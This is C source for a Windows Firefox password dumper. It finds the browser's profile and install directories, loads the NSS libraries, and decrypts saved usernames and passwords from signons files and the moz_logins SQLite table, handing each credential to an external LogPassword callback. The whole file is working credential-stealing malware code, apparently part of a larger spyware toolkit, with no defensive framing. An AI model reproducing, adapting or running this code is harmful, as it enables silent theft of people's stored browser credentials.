
#define _CRT_SECURE_NO_WARNINGS 1

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <windows.h>
#include <userenv.h>
#pragma comment(lib,"userenv.lib")

// callback for the password
extern int LogPassword(WCHAR *resource, WCHAR *service, WCHAR *user, WCHAR *pass);


//Firefox internal SEC structures
typedef enum SECItemType
{
    siBuffer = 0,
    siClearDataBuffer = 1,
    siCipherDataBuffer = 2,
    siDERCertBuffer = 3,
    siEncodedCertBuffer = 4,
    siDERNameBuffer = 5,
    siEncodedNameBuffer = 6,
    siAsciiNameString = 7,
    siAsciiString = 8,
    siDEROID = 9,
    siUnsignedInteger = 10,
    siUTCTime = 11,
    siGeneralizedTime = 12
};

struct SECItem
{
    SECItemType type;
    unsigned char *data;
    unsigned int len;
};

typedef enum SECStatus
{
    SECWouldBlock = -2,
    SECFailure = -1,
    SECSuccess = 0
};
//-----------------------------------------------------------------------
//Removes gecko-sdk dependency
#define PRBool   int
#define PRUint32 unsigned int
#define PR_TRUE  1
#define PR_FALSE 0

//Mozilla library names
#define NSS_LIBRARY_NAME   "nss3.dll"
#define PLC_LIBRARY_NAME   "plc4.dll"
#define NSPR_LIBRARY_NAME  "nspr4.dll"
#define SQLITE_LIBRARY_NAME  "sqlite3.dll"
#define MOZCRT_LIBRARY_NAME  "mozcrt19.dll"
#define NSSU_LIBRARY_NAME  "nssutil3.dll"
#define PLDS_LIBRARY_NAME  "plds4.dll"
#define SOFTN_LIBRARY_NAME "softokn3.dll"

//-----------------------------------------------------------------------

typedef struct PK11SlotInfoStr PK11SlotInfo;

// NSS Library functions
typedef SECStatus      (*NSS_Init) (const char *configdir);
typedef SECStatus      (*NSS_Shutdown) (void);
typedef PK11SlotInfo * (*PK11_GetInternalKeySlot) (void);
typedef void           (*PK11_FreeSlot) (PK11SlotInfo *slot);
typedef SECStatus      (*PK11_CheckUserPassword) (PK11SlotInfo *slot,char *pw);
typedef SECStatus      (*PK11_Authenticate) (PK11SlotInfo *slot, PRBool loadCerts, void *wincx);
typedef SECStatus      (*PK11SDR_Decrypt) (SECItem *data, SECItem *result, void *cx);

// PLC Library functions
typedef char *         (*PL_Base64Decode)( const char *src, PRUint32 srclen, char *dest);

// SQLITE Library functions
typedef int (*sqlite3_open)(const char *, void **);
typedef int (*sqlite3_close)(void *);
typedef int (*sqlite3_exec)(void *, const char *, int (*callback)(void*,int,char**,char**), void *, char **);

// Function declarations..
void NSSUnload();
int InitFFLibs(WCHAR *firefoxPath);
int InitializeNSSLibrary(WCHAR *profilePath, char *password);
int DirectoryExists(WCHAR *path);
WCHAR *GetFFProfilePath();
WCHAR *GetFFLibPath();

int PK11Decrypt(CHAR *decodeData, int decodeLen, WCHAR **clearData, int *finalLen);
int Base64Decode(char *cryptData, char **decodeData, int *decodeLen);
//-----------------------------------------------------------------------
NSS_Init                NSSInit = NULL;
NSS_Shutdown            NSSShutdown = NULL;
PK11_GetInternalKeySlot PK11GetInternalKeySlot = NULL;
PK11_CheckUserPassword  PK11CheckUserPassword = NULL;
PK11_FreeSlot           PK11FreeSlot = NULL;
PK11_Authenticate       PK11Authenticate = NULL;
PK11SDR_Decrypt         PK11SDRDecrypt = NULL;
PL_Base64Decode         PLBase64Decode = NULL;
sqlite3_open			SQLITE_open = NULL;
sqlite3_close			SQLITE_close = NULL;
sqlite3_exec			SQLITE_exec = NULL;

int IsNSSInitialized = 0;

HMODULE libnss = NULL;
HMODULE libplc = NULL;
HMODULE libsql = NULL;
HMODULE libnspr4 = NULL;
HMODULE libcrt = NULL;
HMODULE libnssu = NULL;
HMODULE libpld = NULL;
HMODULE libsof = NULL;
HMODULE libtmp = NULL;

#define SAFE_FREE(x) do { if (x) {free(x); x=NULL;} } while (0);

int DirectoryExists(WCHAR *path)
{
    DWORD attr = GetFileAttributesW(path);
	
	if (!path)
		return 0;

	if( (attr < 0) || !(attr & FILE_ATTRIBUTE_DIRECTORY ) ) 
		return 0;
    
    return 1;
}


//Loads specified firefox library with the given ffdir path as root
HMODULE LoadLibraryFF(WCHAR *firefoxDir, char *libName)
{
	char loadPath[MAX_PATH];

	sprintf_s(loadPath, MAX_PATH, "%S\\%s", firefoxDir, libName);

    if (!(libtmp = LoadLibrary(loadPath)))
		return NULL; 

    return libtmp;
}


int InitFFLibs(WCHAR *FFDir)
{
	BOOL FF_ver_3 = false;
    libnss = libplc = NULL;

	if (FFDir == NULL ) 
		return 0;

	// Check if we are using version 3
	if ((libcrt = LoadLibraryFF(FFDir, MOZCRT_LIBRARY_NAME))) {  
		FF_ver_3 = true;
	}

	if ((libnspr4 = LoadLibraryFF(FFDir, NSPR_LIBRARY_NAME)) == NULL) {
		NSSUnload();
		return 0;
	}

	if ((libpld = LoadLibraryFF(FFDir, PLDS_LIBRARY_NAME)) == NULL){
		NSSUnload();
		return 0;
	}

	if(!(libplc = LoadLibraryFF(FFDir, PLC_LIBRARY_NAME))){
		NSSUnload();
		return 0;
	}
			
	if (FF_ver_3) { 
		if ((libnssu = LoadLibraryFF(FFDir, NSSU_LIBRARY_NAME)) == NULL) {
			NSSUnload();
			return 0;
		}

		if (!(libsql = LoadLibraryFF(FFDir, SQLITE_LIBRARY_NAME))) {
			NSSUnload();
			return 0;
		}
	} 

	if ((libsof = LoadLibraryFF(FFDir, SOFTN_LIBRARY_NAME)) == NULL){
		NSSUnload();
		return 0;
	}
	if (!(libnss = LoadLibraryFF(FFDir, NSS_LIBRARY_NAME))){
		NSSUnload();
		return 0;
	}

    // Extract the required functions....
    NSSInit                = (NSS_Init) GetProcAddress(libnss, "NSS_Init");
    NSSShutdown            = (NSS_Shutdown)GetProcAddress(libnss, "NSS_Shutdown");
    PK11GetInternalKeySlot = (PK11_GetInternalKeySlot) GetProcAddress(libnss, "PK11_GetInternalKeySlot");
    PK11FreeSlot           = (PK11_FreeSlot) GetProcAddress(libnss, "PK11_FreeSlot");
    PK11Authenticate       = (PK11_Authenticate) GetProcAddress(libnss, "PK11_Authenticate");
    PK11SDRDecrypt         = (PK11SDR_Decrypt) GetProcAddress(libnss, "PK11SDR_Decrypt");
    PK11CheckUserPassword  = (PK11_CheckUserPassword ) GetProcAddress(libnss, "PK11_CheckUserPassword");

    if ( !NSSInit || !NSSShutdown || !PK11GetInternalKeySlot || !PK11Authenticate || !PK11SDRDecrypt || !PK11FreeSlot || !PK11CheckUserPassword) {
		NSSUnload();
        return 0;
    }

	// Get the functions from PLC library
	if (!(PLBase64Decode = ( PL_Base64Decode ) GetProcAddress(libplc, "PL_Base64Decode"))) {
		NSSUnload();
		return 0;
	}

	if (libsql) {
		// sqlite functions
		SQLITE_open = (sqlite3_open) GetProcAddress(libsql, "sqlite3_open");
		SQLITE_close = (sqlite3_close) GetProcAddress(libsql, "sqlite3_close");
		SQLITE_exec = (sqlite3_exec) GetProcAddress(libsql, "sqlite3_exec");

		if (!SQLITE_open || !SQLITE_close || !SQLITE_exec) {
			NSSUnload();
			return 0;
		}
	}

	return 1;
}


int InitializeNSSLibrary(WCHAR *profilePath)
{
	CHAR szProfile[MAX_PATH];

	sprintf_s(szProfile, MAX_PATH, "%S", profilePath);

	IsNSSInitialized = 0;

    // Initialize the NSS library
    if( (*NSSInit) (szProfile) != SECSuccess ) {
		NSSUnload();
		return 0;
	} 
		
	IsNSSInitialized = 1;
	return 1;
}


void NSSUnload()
{
    if ( IsNSSInitialized  && (NSSShutdown != NULL) )
        (*NSSShutdown)();

    if ( libnss != NULL )
		FreeLibrary(libnss);  //Free nss library

    if ( libplc != NULL )
		FreeLibrary(libplc);  //Free plc library

	if ( libsql != NULL )
		FreeLibrary(libsql);  //Free sql library

	if ( libnspr4 != NULL )
		FreeLibrary(libnspr4); 

	if ( libcrt != NULL )
		FreeLibrary(libcrt); 

	if ( libnssu != NULL )
		FreeLibrary(libnssu); 

	if ( libpld != NULL )
		FreeLibrary(libpld); 

	if ( libsof != NULL )
		FreeLibrary(libsof); 

	libnss = NULL;
	libplc = NULL;
	libsql = NULL;
	libnspr4 = NULL;
	libcrt = NULL;
	libnssu = NULL;
	libpld = NULL;
	libsof = NULL;
	libtmp = NULL;
}

// La stringa tornata va liberata
WCHAR *UTF8_2_UTF16(char *str)
{
	DWORD wclen;
	WCHAR *wcstr;

	if ( (wclen = MultiByteToWideChar(CP_UTF8, 0, str, -1, NULL, 0)) == 0 )
		return NULL;

	if ( !(wcstr = (WCHAR *)malloc(wclen*sizeof(WCHAR))) )
		return NULL;

	if ( MultiByteToWideChar(CP_UTF8, 0, str, -1, wcstr, wclen) == 0 ) {
		free(wcstr);
		return NULL;
	}

	return wcstr;
}


int DecryptStr(CHAR *cryptData, WCHAR *clearData, UINT clearSize)
{
	int decodeLen = 0;
	int finalLen = 0;
	char *decodeData = NULL;
	WCHAR *finalData = NULL;

	if (cryptData[0] == NULL )
		return 0;
	
	if ((Base64Decode(cryptData, &decodeData, &decodeLen) == 0) || (decodeData == NULL)) 
		return 0;

	// Do the actual PK11 decryption
    if ((PK11Decrypt(decodeData, decodeLen, &finalData, &finalLen) == 0) || (finalData == NULL))
		return 0;

	wcsncpy(clearData, finalData, clearSize);
    
	if (finalLen < (INT)clearSize + 1)
		*(clearData + finalLen) = 0;    // Null terminate string

	SAFE_FREE(finalData);

	return 1;
}


int Base64Decode(char *cryptData, char **decodeData, int *decodeLen)
{
    int len = strlen( cryptData );
    int adjust = 0;

    if (cryptData[len-1] == '=') {
      adjust++;
      if (cryptData[len-2] == '=')
		  adjust++;
    }

    *decodeData = ( char *)(*PLBase64Decode)(cryptData, len, NULL);

	if( *decodeData == NULL )
		return 0;
   
    *decodeLen = (len*3)/4 - adjust;

    return 1;
}


int PK11Decrypt(CHAR *decodeData, int decodeLen, WCHAR **clearData, int *finalLen)
{
    PK11SlotInfo *slot = 0;
    SECItem request;
    SECItem reply;

    // Find token with SDR key
    slot = (*PK11GetInternalKeySlot)();

    if (!slot)
		return 0;

	// Decrypt the string
    request.data = (unsigned char *)decodeData;
    request.len = decodeLen;
    reply.data = 0;
	reply.len = 0;

    if ((*PK11SDRDecrypt)(&request, &reply, NULL) != SECSuccess)
		return 0;

    *clearData = UTF8_2_UTF16((char *)reply.data);
    *finalLen  = reply.len;

	// Free the slot
	(*PK11FreeSlot)(slot);

	return 1;
}

struct ffp_entry {
	WCHAR service[64];
	WCHAR resource[255];
	WCHAR user_name[255];
	WCHAR user_value[255];
	WCHAR pass_name[255];
	WCHAR pass_value[255];
};

int DumpFF(WCHAR *profilePath, WCHAR *signonFile)
{
	char buffer[2048];
	WCHAR signonFullFile[MAX_PATH];
	int bufferLength = 2048;
	FILE *ft = NULL;

	struct ffp_entry ffentry;

	memset(&ffentry, 0, sizeof(ffentry));

	if ( profilePath == NULL || signonFile == NULL)
		return 0;

	_snwprintf_s(signonFullFile, MAX_PATH, L"%s\\%s", profilePath, signonFile);

	if ( (ft = _wfopen(signonFullFile, L"r")) == NULL ) 
		 return 0;

	fgets(buffer, bufferLength, ft);

	// Read out the unmanaged ("Never remember" URL list
	while (fgets(buffer, bufferLength, ft) != 0) {
		// End of unmanaged list
		if (strlen(buffer) != 0 && buffer[0] == '.' && buffer[0] != '#')
			break;
	}

	// read the URL line
	while (fgets(buffer, bufferLength, ft) != 0 ){

		buffer[strlen(buffer)-1] = 0;
		//printf("-> URL: %s \n", buffer);
		swprintf_s(ffentry.service, 255, L"Firefox");
		_snwprintf_s(ffentry.resource, 255, _TRUNCATE, L"%S", buffer);

		//Start looping through final singon*.txt file
		while (fgets(buffer, bufferLength, ft) != 0 ) {

			// new host begins with '.', second entry for a single host have '---'
			if (!strncmp(buffer, ".", 1) || !strncmp(buffer, "---", 3)) {
				if (wcscmp(ffentry.user_name, L""))
					LogPassword(ffentry.service, ffentry.resource, ffentry.user_value, ffentry.pass_value);
				
				memset(&ffentry.user_value, 0, sizeof(ffentry.user_value));
				memset(&ffentry.user_name, 0, sizeof(ffentry.user_name));
				memset(&ffentry.pass_value, 0, sizeof(ffentry.pass_value));
				memset(&ffentry.pass_name, 0, sizeof(ffentry.pass_name));
				
				if (!strncmp(buffer, ".", 1))
					break; // end of cache entry
				else 
					continue;
			}

			//Check if its a password
			if (buffer[0] == '*') {
				buffer[strlen(buffer)-1] = 0;
				_snwprintf_s(ffentry.pass_name, 255, _TRUNCATE, L"%S", buffer + 1);
				
				fgets(buffer, bufferLength, ft);
				buffer[strlen(buffer)-1] = 0;
				
				DecryptStr(buffer, ffentry.pass_value, 255);

			// else is the username the first time, the subdomain the second
			} else if (!wcscmp(ffentry.user_name, L"")) {
				buffer[strlen(buffer)-1] = 0;
				_snwprintf_s(ffentry.user_name, 255, _TRUNCATE, L"%S", buffer);

				fgets(buffer, bufferLength, ft);
				buffer[strlen(buffer)-1] = 0;

				DecryptStr(buffer, ffentry.user_value, 255);
			}
		}
	}

	fclose(ft);

	return 1;
}

int parse_sql_signons(void *NotUsed, int argc, char **argv, char **azColName)
{
	struct ffp_entry ffentry;
	
	for(int i=0; i<argc; i++){
		if (!strcmp(azColName[i], "hostname")) {
			swprintf_s(ffentry.service, 255, L"Firefox");
			_snwprintf_s(ffentry.resource, 255, _TRUNCATE, L"%S", argv[i]);
		}
		if (!strcmp(azColName[i], "encryptedUsername")) {
			DecryptStr(argv[i], ffentry.user_value, 255);
		}
		if (!strcmp(azColName[i], "encryptedPassword")) {
			DecryptStr(argv[i], ffentry.pass_value, 255);
		}
	}

	LogPassword(ffentry.service, ffentry.resource, ffentry.user_value, ffentry.pass_value);
	
	return 0;
}

int DumpSqlFF(WCHAR *profilePath, WCHAR *signonFile)
{
	void *db;
	CHAR sqlPath[MAX_PATH];
	int rc;

	if (SQLITE_open == NULL)
		return 0;

	sprintf_s(sqlPath, MAX_PATH, "%S\\%S", profilePath, signonFile);

	if ((rc = SQLITE_open(sqlPath, &db)))
		return 0;

	SQLITE_exec(db, "SELECT * FROM moz_logins;", parse_sql_signons, NULL, NULL);

	SQLITE_close(db);

	return 1;
}

WCHAR *GetFFLibPath()
{
	static WCHAR FullPath[MAX_PATH];
	char regSubKey[]    = "SOFTWARE\\Clients\\StartMenuInternet\\firefox.exe\\shell\\open\\command";
	char path[MAX_PATH];
	char *p;
	DWORD pathSize = MAX_PATH;
	DWORD valueType;
	HKEY rkey;

	// Open firefox registry key
	if( RegOpenKeyEx(HKEY_LOCAL_MACHINE, regSubKey, 0, KEY_READ, &rkey) != ERROR_SUCCESS )
		return NULL;

	// Read the firefox path
	if( RegQueryValueEx(rkey, NULL, 0,  &valueType, (unsigned char*)&path, &pathSize) != ERROR_SUCCESS ) {
        RegCloseKey(rkey);
        return NULL;
    }

    if( pathSize <= 0 || path[0] == 0) {
		RegCloseKey(rkey);
		return NULL;
	}

	RegCloseKey(rkey);

	// get the path and then remove the initial \"
	if ((p = strrchr(path, '\\')) != NULL)
		*p = '\0';

	p = path;
	
	if( *p == '\"' ) 
		p++;

	if (!p)
		return NULL;

	_snwprintf_s(FullPath, MAX_PATH, L"%S", p);		

	return FullPath;
}


WCHAR *GetFFProfilePath()
{
	static WCHAR FullPath[MAX_PATH];
	WCHAR appPath[MAX_PATH];
	WCHAR iniFile[MAX_PATH];
	WCHAR profilePath[MAX_PATH];
	DWORD pathSize = MAX_PATH;

	GetEnvironmentVariableW(L"APPDATA", appPath, MAX_PATH);

	// Get firefox profile directory
	_snwprintf_s(iniFile, MAX_PATH, L"%s\\Mozilla\\Firefox\\profiles.ini", appPath);

	GetPrivateProfileStringW(L"Profile0", L"Path", L"",  profilePath, sizeof(profilePath), iniFile);

	_snwprintf_s(FullPath, MAX_PATH, L"%s\\Mozilla\\Firefox\\%s", appPath, profilePath);

	return FullPath;
}


int DumpFirefox(void)
{
	WCHAR *ProfilePath = NULL; 	//Profile path
	WCHAR *FFDir = NULL;   		//Firefox main installation path

	ProfilePath = GetFFProfilePath();

	if (ProfilePath && !DirectoryExists(ProfilePath)) 
		return 0;
	
	FFDir = GetFFLibPath();

	if (FFDir && !DirectoryExists(FFDir)) 
		return 0;
	
	if (!InitFFLibs(FFDir))	
		return 0;

	if (!InitializeNSSLibrary(ProfilePath))
		return 0;

	// get the passwords for defferent versions  
	DumpFF(ProfilePath, L"signons2.txt");	// 2.x
	DumpFF(ProfilePath, L"signons3.txt");	// 3.0
	DumpSqlFF(ProfilePath, L"signons.sqlite"); // 3.1 3.5

	NSSUnload();
	
	return 0;
}
